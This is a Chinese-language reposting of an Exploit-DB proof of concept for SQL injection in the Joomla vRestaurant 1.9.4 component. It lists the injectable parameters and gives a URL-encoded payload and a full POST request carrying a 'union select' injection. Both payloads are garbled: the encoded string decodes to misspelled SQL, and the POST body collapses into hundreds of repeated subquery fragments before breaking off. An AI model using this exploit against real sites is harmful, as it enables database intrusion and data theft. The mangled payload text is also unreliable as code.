Joomla vRestaurant 1.9.4 SQL注入漏洞利用代码

漏洞概述 漏洞名称: Joomla! Component vRestaurant 1.9.4 - SQL Injection EDB-ID: 46228 作者: Ihsan Sencan 类型: WEBAPPS 平台: PHP 日期: 2019-01-23 漏洞描述: Joomla! 组件 vRestaurant 1.9.4 存在 SQL 注入漏洞。 影响范围 受影响软件: Joomla! Component vRestaurant 1.9.4 测试环境: WIN7_x64/KaliLinux_x64 漏洞类别: Webapps 修复方案 建议: 更新 Joomla! Component vRestaurant 至最新版本，或采取其他安全措施防止 SQL 注入攻击。 POC代码 ```plaintext Exploit Title: Joomla! Component vRestaurant 1.9.4 - SQL Injection Dork: N/A Date: 2019-01-23 Exploit Author: Ihsan Sencan Vendor Homepage: http://awdtech.com/ Software Link: https://extensions.joomla.org/extensions/extension/a-beverage/vrestaurant/ Version: 1.9.4 Category: Webapps Tested on: WIN7_x64/KaliLinux_x64 CVE: N/A POC: 1) http://localhost/[PATH]/menu-listing-layout/menulists 127%20%75%6e%69%6e%20%20%73%61%6c%65%63%74%20%28%28%53%45%4c%45%43%54%28%40%78%29%40%52%4f%4d%28%53%45%4c%45%43%54%28%40%78%3a keysearch=[SQL] categories[]=[SQL] min=[SQL] max=[SQL] POST /[PATH]/menu-listing-layout/menulists HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 322 Cookie: 109dc66a46474552f38b0164f24ac07=16c226621aab1d9d01c05431e9b453b3 DNT: 1 Connection: keep-alive Upgrade-Insecure-Requests: 1 canonid=236&Itemid=303&keysearch= union select (SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

Joomla vRestaurant 1.9.4 SQL注入漏洞利用代码

目标达成感谢每一位支持者 — 我们达成了 100% 目标！